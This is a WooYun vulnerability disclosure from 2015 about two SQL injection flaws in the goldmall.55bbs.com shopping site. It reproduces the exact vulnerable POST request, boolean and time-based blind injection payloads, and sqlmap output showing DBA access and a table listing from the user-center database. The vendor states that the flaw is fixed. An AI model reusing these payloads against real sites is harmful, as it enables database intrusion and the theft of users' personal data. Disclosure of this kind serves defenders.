我爱购物网两处SQL注入涉及近八百多张表几百万用户信息泄露

发表于 2015年06月04日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0118240

漏洞标题：我爱购物网两处SQL注入涉及近八百多张表几百万用户信息泄露

漏洞详情

披露状态：

2015-06-04: 细节已通知厂商并且等待厂商处理中
2015-06-04: 厂商已经确认，细节仅向厂商公开
2015-06-14: 细节向核心白帽子及相关领域专家公开
2015-06-24: 细节向普通白帽子公开
2015-07-04: 细节向实习白帽子公开
2015-07-19: 细节向公众公开

简要描述：

233

详细说明：

POST /index.php?a=Ajaxinsert&c=ShopDetail HTTP/1.1<br>
Content-Length: 58<br>
Content-Type: application/x-www-form-urlencoded<br>
X-Requested-With: XMLHttpRequest<br>
Referer: goldmall.55bbs.com<br>
Cookie: ****************<br>
Host: goldmall.55bbs.com<br>
Connection: Keep-alive<br>
Accept-Encoding: gzip,deflate<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36<br>
Accept: */*pro_id=231&uid=4296763参数pro_id,uid**********************<br>
这里只测试pro_id参数，<br>
uid参数自测<br>
**********************payload:<br>
and 1=1<br>
and 1=2

POST /index.php?a=Ajaxinsert&c=ShopDetail HTTP/1.1

Content-Length: 58

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: goldmall.55bbs.com

Cookie: ****************

Host: goldmall.55bbs.com

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36

Accept: */*pro_id=231&uid=4296763参数pro_id,uid**********************

这里只测试pro_id参数，

uid参数自测

**********************payload:

and 1=1

and 1=2

漏洞证明：

---<br>
Parameter: pro_id (POST)<br>
    Type: boolean-based blind<br>
    Title: AND boolean-based blind - WHERE or HAVING clause<br>
    Payload: pro_id=231 AND 5906=5906&uid=4296763Type: AND/OR time-based blind<br>
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br>
    Payload: pro_id=231 AND (SELECT * FROM (SELECT(SLEEP(5)))wKRM)&uid=4296763<br>
---web application technology: Nginx<br>
back-end DBMS: MySQL 5.0.12[INFO] retrieved: [email protected]%<br>current user is DBA: True*********DBA权限*********available databases [3]:<br>
[*] `55usercenter`<br>
[*] information_schema<br>
[*] mysqlDatabase: 55usercenter<br>
[728 tables]<br>
+-------------------------------------------+<br>
|  \x0f\x1c\x0fPpn\x10fnkjbwr_\x033         |<br>
| 11_test                                   |<br>
| 55_announcements                          |<br>
| 55_atme_0                                 |<br>
| 55_atme_10                                |<br>
| 55_atme_11                                |<br>
| 55_atme_12                                |<br>
| 55_atme_13                                |<br>
| 55_atme_14                                |<br>
| 55_gethelp                                |<br>
| 55_goldmall_addresses                     |<br>
| 55_goldmall_collect                       |<br>
| 55_goldmall_notice                        |<br>
| 55_goldmall_prodorders                    |<br>
| 55_goldmall_prodtickid                    |<br>
| 55_goldmall_products                      |<br>
| 55_goldmall_records_0                     |<br>
| 55_goldmall_records_10                    |<br>
| 55_goldmall_records_11                    |<br>
| 55_goldmall_records_12                    |<br>
| 55_goldmall_records_13                    |<br>
| 55_goldmall_records_14                    |<br>
| 55_goldmall_records_15                    |<br>
| 55_medalsuser_0                           |<br>
| 55_medalsuser_2                           |<br>
| 55_medalsuser_4                           |<br>
| 55_members?8es\x02\x04K"                  |<br>
| 55_members_count_1                        |<br>
| 55_members_count_2                        |<br>
| 55_members_count_3                        |<br>
| 55_members_dnail_4                        |<br>
| 55_members_email_4                        |<br>
| 55_members_email_6                        |<br>
| 55_members_email_G                        |<br>
| 55_members_email_b                        |<br>
| 55_members_username>z                     |<br>
| 55_members_username_1                     |<br>
| 55_members_username_4                     |<br>
| 55_members_username_5                     |<br>
| 55_members_username_6                     |<br>
| 55_members_username_7                     |<br>
| 55_members_username_b                     |<br>
| 55_members_username_c                     |<br>
| 55_user_0                                 |<br>
| 55_user_1                                 |<br>
| 55_user_2                                 |<br>
| 55_user_3                                 |<br>
| 55_user_4                                 |<br>
| 55_user_5                                 |<br>
| 55_user_6                                 |<br>
| 55_user_7                                 |<br>
| 55_user_8                                 |<br>
| 55_user9!                                 |<br>
| 55_userblog_0                             |<br>
| 55_userblog_11                            |<br>
| 55_userblog_12                            |几百万用户信息

---

Parameter: pro_id (POST)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: pro_id=231 AND 5906=5906&uid=4296763Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: pro_id=231 AND (SELECT * FROM (SELECT(SLEEP(5)))wKRM)&uid=4296763

---web application technology: Nginx

back-end DBMS: MySQL 5.0.12[INFO] retrieved: [email protected]% current user is DBA: True*********DBA权限*********available databases [3]:

[*] `55usercenter`

[*] information_schema

[*] mysqlDatabase: 55usercenter

[728 tables]

+-------------------------------------------+

| \x0f\x1c\x0fPpn\x10fnkjbwr_\x033 |

| 11_test |

| 55_announcements |

| 55_atme_0 |

| 55_atme_10 |

| 55_atme_11 |

| 55_atme_12 |

| 55_atme_13 |

| 55_atme_14 |

| 55_gethelp |

| 55_goldmall_addresses |

| 55_goldmall_collect |

| 55_goldmall_notice |

| 55_goldmall_prodorders |

| 55_goldmall_prodtickid |

| 55_goldmall_products |

| 55_goldmall_records_0 |

| 55_goldmall_records_10 |

| 55_goldmall_records_11 |

| 55_goldmall_records_12 |

| 55_goldmall_records_13 |

| 55_goldmall_records_14 |

| 55_goldmall_records_15 |

| 55_medalsuser_0 |

| 55_medalsuser_2 |

| 55_medalsuser_4 |

| 55_members?8es\x02\x04K" |

| 55_members_count_1 |

| 55_members_count_2 |

| 55_members_count_3 |

| 55_members_dnail_4 |

| 55_members_email_4 |

| 55_members_email_6 |

| 55_members_email_G |

| 55_members_email_b |

| 55_members_username>z |

| 55_members_username_1 |

| 55_members_username_4 |

| 55_members_username_5 |

| 55_members_username_6 |

| 55_members_username_7 |

| 55_members_username_b |

| 55_members_username_c |

| 55_user_0 |

| 55_user_1 |

| 55_user_2 |

| 55_user_3 |

| 55_user_4 |

| 55_user_5 |

| 55_user_6 |

| 55_user_7 |

| 55_user_8 |

| 55_user9! |

| 55_userblog_0 |

| 55_userblog_11 |

| 55_userblog_12 |几百万用户信息

修复方案：

~~~~~~

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-06-0420:45

厂商回复：

漏洞已经修复,感谢作者.

评价

2010-01-01 00:00 sql小神白帽子 | Rank:17 漏洞数:2)

这个网站这么大，你都能找到，你扫了几天啊
2010-01-01 00:00 紫霞仙子白帽子 | Rank:885 漏洞数:70)

@sql小神快准狠在这里就体现出来了。
2010-01-01 00:00 SuperRookie 白帽子 | Rank:46 漏洞数:5)

估计这信息早都泄露了发出来就有背黑锅的
2010-01-01 00:00 小牛牛白帽子 | Rank:60 漏洞数:4)

@紫霞仙子厉害，求带我学习

原文连接：我爱购物网两处SQL注入涉及近八百多张表几百万用户信息泄露 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。